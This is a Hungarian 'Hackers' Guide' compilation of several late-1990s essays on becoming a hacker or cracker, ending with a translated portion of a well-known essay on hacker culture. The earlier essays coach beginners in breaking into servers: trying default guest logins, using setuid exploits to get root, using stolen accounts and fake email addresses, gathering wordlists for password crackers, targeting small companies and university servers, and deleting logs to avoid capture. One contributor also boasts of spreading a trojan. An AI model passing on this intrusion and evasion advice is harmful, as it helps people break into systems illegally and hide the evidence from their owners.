• Sok jó webes link. Ez fontos a gyors értesüléshez, és hogy anyagot és<br />

programokat találjunk segítségül. Sok hasznos link található nálam is, de jobb<br />

híján egy keresô siteon (linkgyûjteményemben is találsz ilyen keresô címet)<br />

lehet keresni ilyeneket.<br />

• Angol nyelv. Hát igen... magyar nyelven nem kaphatunk túl sok segítséget, az<br />

interneten pedig szinte minden angolul van.<br />

Az itt felsoroltak második csoportja nélkül is elindulhatunk, de túl sokáig nem fogunk<br />

eljutni. A hackelésnek/crackelésnek ugyanis éppen az a lényege, hogy ezeket<br />

megismerjuk, és megtaláljuk gyengéit, majd megtanuljuk azokat érdekeinknek<br />

megfelelôen kihasználni. Elôször különbözô ágazatok felületes megismerését<br />

ajánlom, majd amely szimpatikus, abban az irányban továbblépni. Ebben segítséget<br />

nyújt majd az internet, és a magyar nyelven is kapható szakkönyvek.<br />

A különbözô rendszerek, programozási nyelvek és hálózatok tanulása -és NEM<br />

megtanulása- egyenként is egy, esetleg fél év, még akkor is ha minden héten<br />

szánunk rá néhány órát. Ekkor érjük el kb. azt a szintet amellyel már elkezdhetünk<br />

direkt hackeléssel/crackeléssel foglalkozó szövegeket olvasni.<br />

Valószínüleg most sokan abbahagyják az olvasást és kiábrándultan<br />

továbbszörföznek a WEBen. Igen... igazuk lehet?!<br />

47


Hackers’ Guide<br />

Most röviden leírok egy egyszerûbb módszert, (leegyszerüsítve) a sok közül<br />

Nem túl bonyolult: valahonnan szerezzünk vagy töltsünk le egy telnetezésre<br />

alkalmas programot. Ezt esetleg megtehetjük egyes program gyûjteményekbôl a<br />

weben, de a legjobb ha pl. irc-n kérünk valakitôl. /ilyen gyûjteményt találhattok a<br />

linkjeim között is/ Ha már fel tudunk kapcsolódni az internetre és minden be van<br />

állítva, akkor elindíthatjuk a szerzett programot. Keressünk, kérjünk vagy szerezzünk<br />

valahonnan egy szerver címet, majd kapcsolódjunk hozzá. /pl: 1.123.187.65, ez az<br />

IP cím, valami ilyesmit keressünk/ Sajnos minden telnet program másként néz ki,<br />

ezért a mûködését és kezelését már nem tudom elmagyarázni.<br />

Az egész procedúra lényege, hogy hozzákapcsolódunk egy speciális hálózati<br />

operációs rendszerû szerverhez (=> ilyen gépekrôl jön többek között a weboldalak<br />

tartalma, a letölthetô filek és egyáltalán minden adat, információ amelyet távolról<br />

kapunk meg), amelynek tulajdonképpen megkapjuk egy ablakba a kezelô felületét,<br />

vagyis bizonyos értelemben azt a képet amit akkor látnánk, ha ott ülnénk helyben a<br />

gép elôtt. Ezt talán ahhoz tudnám hasonlítani, amikor Windows95 alatt megnyitunk<br />

egy MS-DOS ablakot és oda írjuk be a parancsokat.<br />

Természetesen ezeken a gépeken olyan rendszer van mint például a UNIX, amely<br />

biztosítja, hogy ismeretlenek semmit se tudjanak kezdeni géppel, és az átlag<br />

felhasználók se tudjanak kárt tenni magában a rendszerben, legfeljebb csak saját<br />

dokumentumaikban és programjaikban. Ez egész egyszerûen úgy van megoldva,<br />

hogy az átlag felhasználó nem is látja a rendszer belsô felépítését és<br />

programszerkezetét, csak a számára engedélyezett részeket<br />

olvashatja/írhatja/futtathatja.<br />

Egy hacker dolga egy ilyen rendszert feltörni, tehát megszerezni magának<br />

valamilyen módon a jogosultságot az egész rendszer irányítására....<br />

Itt kezdôdik az a pont ahol már csak az irdatlan hosszúságú,és nem igazán könnyen<br />

érthetô angol hacker fileok olvasásával megyünk valamire. Bennük tanácsot és<br />

ötletet kaphatunk. Természetesen ez azért nem ennyire egyszerû... konkrét<br />

eseteknél csak a frissebb anyagokkal megyünk valamire, mert a régiek olyan<br />

hiányosságokat és kiskpukat használtak ki a programokban, amelyeket azóta<br />

valószínüleg már rég kiküszöböltek.Fontos, hogy inkább elôször olvassunk inkább és<br />

tudjunk meg mindent amit lehet. Állami gépeket nagy ívben kerüljük el, viszonylag<br />

veszélytelenebb célpontok elsô nekifutásra az egyetemi és kollégiumi szervrek.<br />

Elôször eddig tartott a szöveg, de gondoltam ezt talán már sokan azelôtt is tudták,<br />

mielôtt idejöttek, ezért még a történet egyik lehetséges befejezését is leírom.<br />

Szükségünk van még egy névre és egy jelszóra, amivel legalább átlag<br />

felhasználókent bejuthatunk a szerverre. Sok helyen például ilyesmi:<br />

név: guest, user...<br />

jelszó (esetleg semmi): guest, user, demo...<br />

de jobb ha valakit megkérünk, hogy mondjon ilyet nekünk, vagy crackelünk egyet...<br />

bár ez még hátrébb van.<br />

48


Hackers’ Guide<br />

Léteznek, és sok helyen letölthetôek úgynevezett EXPLOIT programok, amelyek<br />

különösen nagy segítséget jelentenek néha. Mûködésük megértéséhez egy kis Unix<br />

ismeret is szükséges.<br />

A Unixban minden filenál megvan határozva, hogy a felhasználok mely csoportjának<br />

van olyan jogosultsága, hogy azt a filet olvashatja, írhatja és módosíthatja. Konkrétan<br />

ez úgy néz ki, hogy /mindenki tartozik a file szemponjából valamilyen csoporthoz/ a<br />

file létrejöttekor be kell állítani, hogy a file tulajdonosának, a vele egy csoportban<br />

lévôknek és az összes többieknek mire adunk engedélyt a fileal kapcsolatban. Van<br />

egy olyan speciális funkció, hogy amíg a filét mondjuk egy bármilyen személy futtatja<br />

/természetesen ha van erre jogosultsága/ akkor olyan jogosultságokat kap a<br />

rendszeren belül, mint a file tulajdonosa.<br />

Erre gyakran szükség van, amennyiben ez komolabban érdekel valakit, az máris<br />

mehet a könyvesboltba egy Unix könyvért.<br />

Visszatérve a tárgyhoz, ez akkor lehet hasznos egy hackernek, ha a file történetesen<br />

egy a rendszergazda (=root) tulajdonában álló file. Mint tudjuk a rendszergazdának<br />

korlátlan joga van az egész rendszer módosítására, tehát ha a filet futtatás közben<br />

sikerül megállítanunk, akkor az azt jelenti, hogy mi megkapjuk a root jogait és így a<br />

teljhatalmat is a rendszer fölött. Az Exploitok abban segítenek, hogy egy hibásan<br />

megírt programot megállítanak, és így megkímélnek minket minden komoly<br />

munkától.<br />

Ha egy renszeresen használt programban hibát talál valaki, és ez a valaki monjuk<br />

éppen egy cracker, akkor gyakran megírja hozzá az Exploitot és az pillanatok alatt<br />

elterjed az egész világon. Persze erre válaszul a program készítôi gyorsan kijavítják<br />

a hibát, és a magukra valamit is adó rendszergazdák például megszerzik a hiba<br />

kijavítását elvégzô programot. Ha sikerült mindez, akkor következik a<br />

mesterkedésünk nyomainak eltakarítása, ami megint csak egy külön tudomány...<br />

Hát... ennyire futotta így most hirtelen... Remélem most ez is segített!<br />

Eredeti: CoDemon<br />

- H3XR00T -<br />

http://hexnet.hpage.<br />

net/<br />

************************************************************************************************<br />

Kik a hackerek<br />

49


Hackers’ Guide<br />

FIGYELEM! A HACKERKEDEST VILAGSZERTE BUNTETIK!!! AMENNYIBEN TE<br />

TAVOL KIVANOD TARTANI MAGAD AZ ILYEN JELLEGU DOLGOKTOL, KERLEK<br />

NYOMD MEG AZ ESC-ET, TOROLD LE EZT ES AZ EHHEZ HASONLO<br />

DOLGOKAT A GEPEDROL, ES FELEJTSD EL, HOGY EZEKET HOL LEHET<br />

MEGTALALNI! AMENNYIBEN UGY DONTESZ, HOGY TOVABBOLVASOD, EL<br />

KELL FOGADNOD,HOGY A FELELOSSEG KIZAROLAG A TIED!<br />

TARTALOM<br />

Bevezeto<br />

Kik a Hackerek?<br />

Milyen egy igazi Hacker?<br />

Hackerek alaptorvenyei<br />

Hogyan is vagjunk neki?<br />

Vegszo<br />

Par szot a csapatrol<br />

Bevezeto<br />

Hali mindenkinek! Ennek a filenak az a celja, hogy kezdo hackerpalantaknak<br />

segitseget nyujtsunk, segitsuk oket elinditani ezen a nehez uton. Bizonyara felmerul<br />

a kerdes, hogy miert eppen magyarul irom, miert nem angolul, es ha mar magyarul<br />

irom, akkor miert nem ekezetekkel. A valasz egyszeru. Mivel mi magyarok vagyunk,<br />

ezert magyarul jobban tudunk, es a kezdo magyar nyelvu hackerek pedig jobban<br />

megertik, mint a hasonlo temaban irodott angolnyelvu szovegeket. Az ekezet pedig<br />

egy olyan dolog, hogy ha en most ekezettel irnam, akkor a kulonfele gepeken<br />

kulonbozo kepp jelenne meg, es eleg zavaro tud lenni az ekezetek helyett a sok<br />

kriksz-kraksz.<br />

Kik a hackerek?<br />

A szo egyik jelentese: csakany. Az elso hackerek a szamitogep elterjedese utan<br />

szulettek meg, igaz akkor meg mast jelentett hackernek lenni. A kezdeti idokben a<br />

szamitogepek qrva nagyok voltak, kicsi memoriaval, es nuku wincsi. Ekkor a<br />

programozoknak meg erdekuk volt, hogy minel kisebbre irjak meg a programokat,<br />

mert a lemez es a memoria merete veges volt. Az eszes diakok arra torekedtek,<br />

hogy a kesz programokat minel jobban lefaragjak, minel kisebb legyen a program, es<br />

ugyanazt tudja. Ehhez nem kis programozasi tudas kellett. Tehat ok az osok.<br />

Buszkek lehetunk rajuk! Ma mar persze a halozatok birodalmaban van a Hackerek<br />

hazaja.<br />

Roviden: A hacker az, aki a halozatokba betor, helyben, vagy interneten keresztul. A<br />

hackereket persze tobb csoportba lehet osztani, tevekenyseguktol fuggoen. Vannak<br />

akik sajat maguk irnak progikat a feltoreshez, vannak akik a masok altal megirt,<br />

kozzetett programokkal dolgoznak, de a tobbseg vegyes osszetetelu, irnak is, maset<br />

is hasznaljak. A fontosabb kulonbseg a hackerek kozott az, hogy miert csinaljak az<br />

egeszet.<br />

50


- ElitHacker<br />

- Hacker<br />

Ok azok, akik azert tornek be valahova, mert elvezik.<br />

Megis mi az, ami miatt csinaljak?<br />

Hackers’ Guide<br />

Az erzes miatt. Amiatt, hogy XY helyre sikerult betorni. Mert ahhoz, hogy az ember<br />

valahova betorjon, programokra, technikara, logikara, ugyessegre van szukseg. Nem<br />

kis nehezseg megcsinalni ugy, hogy nehogy elcsipjek oket. Kockazatos jatek, ahol<br />

neha a gyors dontesen mulik minden. Ki kell jatszani a rendszer vedelmet (akarcsak<br />

a fociban a csatarnak a vedelmet). Ez korulbelul olyan erzes, mint egy nagyon<br />

biztonsagos bortonbol<br />

megszokni. Bennuk van a virtus. "Azert is megcsinaljuk!"<br />

-Jerk, vagy mas neven a Hackerek vandalja.<br />

Ok olyanok mint az igazi vandalok, csak rombolnak ertelem nelkul, ebben lelik<br />

oromuket. (Ez a tipus kihalofelben van, ha mar ki nem halt...)<br />

A hackerek kozott vannak olyanok, akik bankokba tornek be, penzt lopnak, az<br />

eszukkel. Ez nem tul jellemzo a hackerek tarsadalmaban.<br />

A tobbseg ha valahova betort, akkor:<br />

- Esetleg biztositja, hogy maskor is be tudjon jonni.<br />

- Esetleg ha jo progik vannak a serveren, elmenti maganak.<br />

- Esetleg ha jo progik vannak a serveren, akkor masok szamara is hozzaferhetove<br />

teszi, vagy a lementett progikat valahol kozzeteszi a neten.<br />

- Esetleg a serveren hagy vmilyen szovegfilet, amiben leirja, hol van res a<br />

rendszerben, hol tudott bejonni. (Oket szeretik a rendszergazdak!)<br />

- Penzert karbantartja a servert, igy o is es a rendszergazda is jol jar.<br />

- Stb.<br />

Milyen egy igazi hacker?<br />

1. Intelligens<br />

2. Mindent akar tudni, mindenre kivancsi<br />

3. Nem tul rossz tanulo a suliban, mivel a hackeleshez kell a logika es esz<br />

4. Nem rombol szandekosan egy rendszerben, ahova betort<br />

5. Az igazi hacker mindig kepzi magat, hogy jobb legyen<br />

6. Igyekszik a legujabb technologiat elsajatitani<br />

7. Nyugodtak, megbizhatok<br />

8. Paranoias<br />

9. Tud angolul, esetleg nemetul is<br />

10. Programozik ASM-ben vagy C-ben, es meg egy masik programnyelvben is<br />

Hackerek alaptorvenyei<br />

51


Hackers’ Guide<br />

1. Ne semmisitsd meg a feltort operacios rendszert, ne tegyel benne kart, ha nem<br />

muszaj!<br />

2. Ne feledkezz meg letorolni azokat a filekat, amik veszelyeztetik a menekulesedet,<br />

amik alapjan azonosithatnak, vagy amikbol esetleg rajohetnek, hogy hogyan jutottal<br />

be a rendszerbe!<br />

3. Sehol ne hagyd meg a valodi neved, telefonszamod, vagy olyat, ami alapjan<br />

konnyen elkaphatnak!<br />

4. Vigyazz, kinek mit mondasz magadrol! Ilyen temarol lehetoleg NE telefonon vagy<br />

zsufolt helyen beszelgessetek! Ne adj lehetoseget annak, hogy zsarolni tudjanak!<br />

5. Akit meg nem ismersz igazan, annak ne add meg a valodi telefonszamodat!<br />

6. Allami es gazdasagi szerverekre ne torj be, csak ha nagyon profi vagy, ugyanis<br />

ezek vannak a legjobb vedelemmel ellatva! Kezdj inkabb eloszor kisebb cegekkel!<br />

7. Legy paranoias! Mivel a te tevekenyseged torvenyserto, ezert mindig resen kell<br />

lenned! Kodold azokat a filejaidat, amik esetleg bizonyitekul szolgalhatnak ellened!<br />

Az ilyen temaju jegyzeteidet, cimeidet tartsd hozzaferhetetlen, nehezen elerheto<br />

helyen!<br />

8. Levelben ne irj a tevekenysegedrol, Emailben lehetoleg csak PGP-vel irj ilyen<br />

temarol, IRC-n pedig egyedul a DCC CHAT-ben bizhatsz meg, jelen pillanatban<br />

egyedul az nem kovetheto nyomon, hogy ott mirol beszelgettek.<br />

9. Nem szegyen masoktol tanulni! Sot! A jovod mulhat egy-egy jo tanacstol, altalad<br />

ismeretlen technikatol, fortelytol! EZERT: NYUGODTAN KERDEZZ, ES TANULJ<br />

MAS HACKEREKTOL! De ez viszont is igaz, ha toled kernek segitseget, te is segits<br />

masoknak!<br />

10. Igyekezz minnel tobbet tanulni, minel tobb filet elolvasni azokbol, amit a<br />

vilagszerte elo hackerek irtak, mert mindig lehet ujat tanulni! Addig ne kezdj bele,<br />

amig nagyobb ismeretet el nem sajatitasz ezen a teren, mert kulonben konnyen racs<br />

moge kerulhetsz, vagy fizetheted a birsagot, ezzel egyidejuleg pedig konnyen<br />

kirakhatnak a sulibol, munkahelyedrol!<br />

11. Ne becsuld ala a rendszer es a rendszergazda kepesseget, legy ovatos!<br />

12. Olyan helyre, ahol tudod hogy varnak rad, vagy a hackerek tamadasara, NE<br />

PROBALJ MEG BETORNI!!!!!! Ezzel mar tobben megjartak vilagszerte.<br />

13. Ha betortel valahova, es mindenkepp hagyni akarsz valami azonositot a<br />

csapatodrol, vagy magadrol, akkor lehetoleg gondold vegig, hogy ha egyszer<br />

valamikor elkapnak, akkor azok alapjan mar gyerekjatek lesz megmondani, hogy<br />

hova tortel be te! Meg le se tagadhatod, mivel ott hagyod a csapatod, vagy sajat<br />

kezjegyedet.<br />

52


Hackers’ Guide<br />

14. VEGUL: LEGY MAGABIZTOS, ES NE VESZITSD EL A FEJED BAJ ESETEN!<br />

Egy dolog betorni valahova. Sokkal nehezebb kijonni ugy, hogy nehogy elkapjanak<br />

utana es lehetoleg meg a server winchestereben se kelljen wipeolgatni. Mert az igazi<br />

hacker tudomanya ebben all!<br />

Hogy is vagjunk neki?<br />

Eloszoris szerezz be:<br />

- Oktato filekat a kulonbozo oprendszerek feltoreserol.<br />

- Programokat a kulonbozo oprendszerek feltoresehez.<br />

- Port Scannert<br />

- FTP Klienst<br />

- Telnet Klienst<br />

- Fake IP-t, Fake Hostot biztosito progit (lehetoleg)<br />

- Valakinek az Accountjat, amivel kitudsz egy szolgaltaton keresztul jutni a netre.<br />

(SAJAT ACCOUNTTAL HACKERKEDNI ONGYILKOSSAG!!!)<br />

- Szabad idot a hackerkedeshez<br />

- Legalabb 1, hamis adatokkal letrehozott Emailcimet egy ingyenes Emailcimet<br />

biztosito serveren.<br />

- Esetleg egy progit, amivel fake emailokat tudsz irni szukseg eseten. (Persze azt ne<br />

felejtsd el tesztelni eloszor!)<br />

- Egy vagy tobb filet, amiben abc, vagy cba sorrendben vannak szavak szotarbol<br />

kiirva (angol nyelvu mindenkepp kell, +1 olyan nyelvu, amilyen nyelvu orszag<br />

szerverere szeretnel betorni)! Ez a kodporgeto progikhoz kell.<br />

- Szotart kezkozelben, ha valamiert szukseged lenne ra!<br />

Vegszo<br />

Azt hiszem ennyi! Ezek utan mar nincs mas hatra, minthogy mindenkinek sok sikert<br />

kivanjak, es jo szerencset! Angolul pedig aki teheti tanuljon, mert az ilyen temaban irt<br />

szovegek 99%-a angol nyelven irodott, ertheto okokbol. Ezek utan pedig szerezzetek<br />

be a kellekeket, es kepezzetek magatokat, ha meg ezek utan is ugy gondoljatok,<br />

hogy hackerek akartok lenni!<br />

Szerző: Fireball<br />

And SpEcIaL ThNx 2:<br />

Zsu, wHo WaS The CoRReCtOR, and She GaVe ME CooL IdEaZ!<br />

************************************************************************************************<br />

53


Hackers’ Guide<br />

Mi is a cracker? Hogyan tevékenykedj illegálisan de biztonságban<br />

Ebben a rövid leírásban elmagyarázom neked a különbséget a hacker és a cracker<br />

között. Elmondom, hogy, hogyan válhatsz crackerré, és hogy, hogyan tudsz<br />

biztonságosan dolgozni a neten. Azonban ne feledd: Soha nem tudhatod, hogy ki,<br />

mikor és honnan figyel téged!<br />

A neten és az egyéb helyeken már rengeteg "leírás" és okfejtés született,<br />

hacker/cracker ügyben. Sajnos gyakran (szinte mindíg) keverik a fogalmakat pedig<br />

nagyon messzi állnak egymástól. A sajtó miatt mostmár a hacker egyet jelent a<br />

"csúnya rossz bácsikkal akik betörnek a számítógépes rendszerekbe és ellopják sok<br />

sok ember hitelkártyaszámát, megcsapolják bankszámláját. Ezt a tévhitet<br />

szétoszlatván nézzük meg, hogy mi is a különbség hacker és cracker között.<br />

A hackerek olyan emberek (gyakran programozók is) akik betéve tudják az operációs<br />

rendszerek és más egyéb programok működését és felépítését. Legtöbbször ők<br />

fedezik fel a biztonsági réseket is a programokban/rendszerekben. A hackerek<br />

állandóan képzik magukat, és a megszerzett információkat, új felfedezéseket is<br />

ingyen közzé teszik. És talán ami megkülönbözteni a crackerektől a hackereket az,<br />

hogy SOHA nem tesznek kárt a rendszerekben ahova bejutnak.<br />

A cracker olyan emberke aki kizárólag rombolás céljából tör be a rendszerekbe.<br />

Semmi más nem érdekli, csak a rombolás. A crackernek van egy másik "<br />

programozó alfaja" is aki programokat tör fel. Tehát a crackereket könnyű<br />

megkülönböztetni, mert általában a tevékenységük a rossz szándékon alapszik.<br />

[Megjegyezném, hogy gyakran a hackerek sem tudják egyértelműen besorolni<br />

magukat. Mert ugye ha a hacker nem rombol; akkor amikor a nyomokat eltünteti<br />

maga után akkor kell a log-fileokat buherálni sokszor komplett delete az egész log<br />

file... Szóval erre szoktam azt mondani, hogy a zseni és az őrült között is nagyon<br />

vékony a határ! - H3XR00T]<br />

Na... remélem kicsit azért megvilágosodott a hacker és a cracker közti különbség.<br />

Most pedig kicsit bővebben a crackerekről.<br />

Az első dolog amit nagyon ajánlanék az, hogy olvass sokat! A legjobb útja a<br />

tanulásnak. Persze angol nyelvismeret nélkül nem fog meni, de vannak olyan rendes<br />

emberek [Jaja! =) - H3XR00T] akik, ha idejük engedi lefordítgatják az angol<br />

szövegeket ikes magyar nyelvre... a másik fontos dolog a gyakrolás. Mert két dolog<br />

az elmélet, és a gyakrolat. Szövegeket rengeteget lehet találni a neten csak jó helyen<br />

kell őket keresni; általában minden hacker oldalon van valami kis ismertetőanyag.<br />

Mindent olvass el és nézd át az ismertebb oprendszerek leírását/műközdését!<br />

(Win9x,2000, Linux)<br />

Másodszor, ismerned kell a netet! Hogyan épül fel, minek mi a feladata, mit használ,<br />

mindent! Értsd a netet és segíteni fog a munkádban!<br />

Keress barátokat, és ne ellenségeket! Rengeteg ember van aki szívesen segít neked<br />

ha értelmes kérdéseket teszel fel nekik. De hangsúlyozottan értelmes kérdésekről<br />

van szó, és nem "taníts meg hackelni" típusú lamer kérdésekről. [Az ilyenekre, én<br />

nem is válaszolok... - H3XR00T] És csak akkor kérdezz ha már szerinted mindent<br />

54


Hackers’ Guide<br />

végigpróbáltál. Ha a birtokodba jut valami info akkor azt ne tartsd meg magadnak,<br />

oszd meg másokkal is! Mert ha te sem osztod meg akkor más se és akkor nem fog<br />

születni egyetlen egy ilyen doksi sem!<br />

Nézz meg sok hacker oldalt! Ezeken rengeteg naprakész információt találhatsz.<br />

[Példaképp megemlíteném, a magyarországi BO lázt. Nem dicsekvésképpen<br />

mondom, de talán Mo.-n az első körben próbálgattam ki ezt a trójai programot!<br />

Akkoriban a matávos előfizetőknek a fele már BO-val fertőzött volt! - H3XR00T]<br />

Ismerd meg a hackereket/crackereket! Kik ők, mit és miért csinálnak! Nézd meg a<br />

híresebb hackercsoportok weblapjait, kérdezz tőlük de ne hulye kérdéseket! Ismerd<br />

meg a trójai programokat, vírusokat, és kezdj ismertetőket írni és írd le mit tudsz! Ha<br />

találsz barátokat alapítsatok csapatot! NE lamer csapatot, igazi tevékeny csapatot!<br />

Mert ugye az nem sokat ér, ha vannak a csapatban 20-an és abból 2-3 dolgozik a<br />

többi még a levelezőlistára sem írogat...<br />

Mint már említettem szerezz barátokat! Soha ne mondj hülyeségeket! Nem tudhatod,<br />

hogy kivel beszélsz valójában! Lehet, hogy egy lamer, de lehet, hogy egy nálad<br />

nagyságrendekkel többet tudó cracker, és akkor véged! Nefeledd, hogy mindíg van<br />

olyan aki nálad többet tud!<br />

Lehetőleg ne törj fel oldalakat szórakozásból, és soha ne törj be oda ahol tudod,<br />

hogy várhatnak! Lehetőleg az állami intézményeket is kerüld. Mielőtt elkezdenél<br />

crackelni, tanuld meg a főbb dolgokat! Mi is az IP, hogyan épül fel, mi az<br />

ftp/telnet/www/e-mail/portok..stb. Ismerd meg hogyan működnek, és így lehetőséged<br />

nyílik a hibák feltárására, és akkor sikeresen betörhetsz!<br />

Még egy fontos dolog: tanuld meg C++ és/vagy Visual Basic -ben programozni. Ez a<br />

kettő mindenképpen nyelv kelleni fog a jövőben! Bár sok programot (Pl: exploit) lehet<br />

találni a neten, de ha nem találsz magadnak kell írnod egyet!<br />

Zárásként mindenféle egyéb dolgok... Rengeteg ember van akik heccből törnek fel<br />

számítógépeket. Ezek a lamerek. Hülye emberek akik megpróbálnak téged is<br />

elpusztítani. Ezér mindíg légy nagyon óvatos, és körültekintő! Soha ne fogadj el<br />

idegentől fileokat. Aki küldte lehet, hogy valójában vírust, vagy trójai programot<br />

küldött neked és amint elindítod véged van! Soha ne beszélj a terveidről a neten, mit<br />

fogsz feltörni, mikor... stb. Főleg ne nyílvános fórumokon. És soha ne felejtsd! Nem<br />

tudhatod ki figyel téged!<br />

Eredeti: tH3 m4n!4c dancho@mbox.digsys.bg<br />

- H3XR00T -<br />

http://hexnet.hpage.<br />

net/<br />

************************************************************************************************<br />

Hogyan lesz az emberből Hacker<br />

55


Hackers’ Guide<br />

Miért ez az iromány?<br />

Mint a Zsargon Fájl szerkesztője, gyakran kapok e-maileket lelkes hálózaton kezdő<br />

újoncoktól, amikben (tulajdonképpen) az kérdezik, hogy "hogyan lehet belőlem is<br />

nagy hacker varázsló?". Különös, de úgy tűnik, hogy nincsen egy GyIK vagy Web<br />

oldal sem, ami ezzel a fontos kérdéssel foglakozna, úgyhogy itt van az enyém.<br />

Ha offline olvasod ezt a doksit, megtalálod a legfrissebb (angol nyelvű) változatot a<br />

http://www.tuxedo.org/~esr/faqs/hacker-howto.html weblapon.<br />

Mi az, hogy Hacker?<br />

A Zsargon fájlban találsz egy csomó definíciót a `hacker' kifejezésre, a legtöbbjükben<br />

szerepel a jó műszaki érzék, a problémamegoldás és a korlátok ledöntésének<br />

élvezete. Ha viszont konkrétan az érdekel, hogy hogyan lehetsz Te is hacker, akkor<br />

csak két dolog a fontos. Van egy kultúra, a kiváló programozók és hálózati varázslók<br />

közös kultúrája, ami évtizedekre nyúlik vissza, az első időosztásos miniszámítógépek<br />

és a legelső ARPAnet kísérletek idejébe. Ezek az emberek honosították meg a<br />

`hacker' kifejezést. Hackerek építették az Internetet. Hackerek tették a Unix<br />

operációs rendszert azzá, ami. Hackerek üzemeltetik a Usenet hírfórumokat.<br />

Hackerek tartják működésben a Világhálót. Ha ennek a kultúrának a része vagy, ha<br />

hozzájárultál valamivel és mások a közösségből ismernek és hackernek titulálnak,<br />

akkor hacker vagy.<br />

A hacker beállítottság nem korlátozódik a szoftver-hacker kultúrára. Vannak olyanok,<br />

akik a hacker mentalitást más területen gyakorolják, ez lehet pl. elektronika vagy<br />

zene -- valójában ezzel a viselkedési formával találkozhatsz a tudományok vagy a<br />

művészet legmagasabb szintjein. A szofver-hackerek elismerik ezeket a<br />

rokonlelkeket, néha nyíltan "hackereknek" is hívják őket -- egyesek azt vallják, hogy a<br />

hacker természet valójában független attól, hogy mit is hackel az illető. Ennek<br />

ellenére, e dokumentum hátralévő részében a szoftver-hackerek képességeivel és<br />

viselkedésükkel, valamint a `hacker' kifejezést létrehozó közös kultúra tradíciójával<br />

foglalkozom.<br />

Van egy másik csoport is, amely az hangoztatja magáról, hogy hackerekből áll, de ez<br />

nem fedi a valóságot. Ezek az emberek (főleg serdülő fiúk) azok, akik poénosnak<br />

tartják, hogy betörnek számítógépekre, vagy szórakoznak a telefonhálózattal. Az<br />

igazi hackerek ezeket az embereket `crackereknek' hívják és hangoztatják, hogy<br />

semmi közös nincs bennük. Az igazi hackerek szerint a crackerek lusták, felelőtlenek<br />

és nem briliáns elmék, azzal érvelnek hogy a biztonsági intézkedések megsértése<br />

nem tesz hackerré, ugyanúgy, ahogy attól sem leszel közlekedésmérnök, ha el tudsz<br />

kötni egy autót. Sajnos sok író és újságíró keveri a két kifejezést, a crackereket is a<br />

`hacker' kifejezéssel írja le; ez kimondhatatlanul idegesíti az igazi hackert.<br />

Az alapvető különbség: a hackerek építenek, míg a crackerek rombolnak.<br />

Ha hacker akarsz lenni, olvass tovább. Ha cracker akarsz lenni, olvasd el az alt.2600<br />

hírcsoportot, és készülj fel öttől tíz évig terjedő börtönbüntetésre, miután kiderült,<br />

hogy nem vagy olyan okos, mint hitted. Ennyit a crackerekről.<br />

A hacker hozzáállása<br />

A hacker problémákat old meg és dolgokat hoz létre, hisz a szabadságban és a<br />

kölcsönös önkéntes segítségnyújtásban. Ahhoz, hogy befogadjanak a hackerek,<br />

56


Hackers’ Guide<br />

Neked is hasonló hozzáállást kell tanúsítanod. Ahhoz, hogy ennek az elvárásnak<br />

megfelelően tudjál viselkedni, tényleg hinned kell ebben a hozzáállásban.<br />

Ha úgy gondolod, hogy csak azért viselkedsz úgy, mint a hackerek, hogy<br />

befogadjanak, akkor elsiklasz a lényeg felett. Az, hogy higgyél ennek a<br />

viselkedésnek a helyességében, nagyon fontos Neked -- ez segít a tanulásban, és<br />

ez motivál. Mint minden kreatív művészetnél, nem elég a mestert csak ésszel<br />

imitálni, szívvel is kell.<br />

Tehát, ha hacker akarsz lenni, ismételgesd a következő dolgokat, amíg el nem<br />

hiszed őket:<br />

1. A világ tele van lebilincselő, megoldásra váró problémákkal<br />

Hackernek lenni szórakoztató dolog, de ez az a fajta szórakozás, ami erőfeszítést<br />

igényel. Az erőfeszítés nagy része a motiváció. A sikeres atlétákat az fizikailag<br />

mámorító érzés motiválja, hogy testüket tökéletesítik, és a lehető legjobbat kihozva<br />

magukból túlszárnyalják a saját fizikai korlátjaikat. Ehhez hasonlóan, akkor lehetsz jó<br />

hacker, ha izgalomba hoznak a megoldásra váró problémák, cél és motiváló erő a<br />

képességeid fejlesztése és az elméd edzése.<br />

Ha természetednél fogva nem így érzel, meg kell változnod ahhoz, hogy sikeres<br />

hacker legyél. Máskülönben gyorsan azon kapod magad, hogy a hackelésre szánt<br />

energiád elfolyik más irányba, mint pl. szex, pénz vagy társadalmi elismerés<br />

megszerzésének irányába.<br />

(Ezek mellett meg kell tanulnod hinni a tanulási képességedben -- hinni abban, hogy<br />

ha nem is tudsz mindent, ami a probléma megoldásához kell, ha elkezded a<br />

probléma egy részét boncolgatni, megtanulsz közben annyit, amennyi a következő<br />

részfeladat megoldásához szükséges -- és így tovább, amíg az egész problémát<br />

meg nem oldod.)<br />

2. Soha senkinek nem kell ugyanazt a problémát kétszer megoldani<br />

A kreatív elmék értékes és korlátozott erőforrást képeznek. Nem szabad őket a kerék<br />

újrafeltalálására pazarolni, amikor annyi új érdekes probléma vár megoldásra.<br />

A hacker magatartására jellemző, hogy tudatában van annak, hogy a többi hacker<br />

ideje értékes -- ezért az információ megosztását majdnem erkölcsi kötelességének<br />

érzi. Az így megosztott megoldások segítségével más hackerek új problémákkal<br />

tudnak foglakozni.<br />

(Nehogy azt hidd, hogy minden kreativitásodból származó szellemi termékedet be<br />

kell dobnod a közösbe, bár minél többet adsz, annál jobban fog a többi hacker<br />

tisztelni. A hacker értékekkel összefér, ha eladsz annyit magadból, hogy kifizesd a<br />

lakbért, tudjál kaját és számítógépeket venni. Belefér, ha hackelésből eltartod a<br />

családodat, sőt az is, ha meggazdagszol, mindaddig, amíg nem felejted el, hogy<br />

hacker vagy.)<br />

3. Az unalom és a robotolás rossz<br />

Hackert (és a kreatív embereket általában) nem szabad unalomra ítélni vagy ostoba,<br />

robotolás jellegű munkára fogni, ha ez mégis megtörténik az azt jelenti, hogy nem azt<br />

csinálja, amihez csak ő ért -- megoldást keresni új problémákra. Ez a pazarlás<br />

mindenkinek rossz. Ezért az unalom és a robotolás nem csak kellemetlen, de rossz<br />

is mindenkinek.<br />

57


Hackers’ Guide<br />

Ha hackerként akarsz viselkedni, akkor annyira kell ebben higgyél, hogy<br />

automatizáld az unalmas dolgokat, amennyire csak lehet, nem csak magad miatt, de<br />

mindenki más miatt is (főleg a többi hackerért).<br />

(Erre a szabályra egy látszólagos kivétel van. A hackerek csinálnak néha dolgokat,<br />

amelyek unalmasnak és robotjellegűnek tűnhetnek a kívülálló számára, de valójában<br />

ezekre azért van szükség, hogy egy képességet fejlesszenek, vagy gyakorlatot<br />

szerezzenek valamiben, amit másképp nem ismerhetnének meg. Ez azonban a<br />

hacker saját választása -- egy gondolkodó embert sem szabad unalomba<br />

kényszeríteni.)<br />

4. A szabadság jó dolog<br />

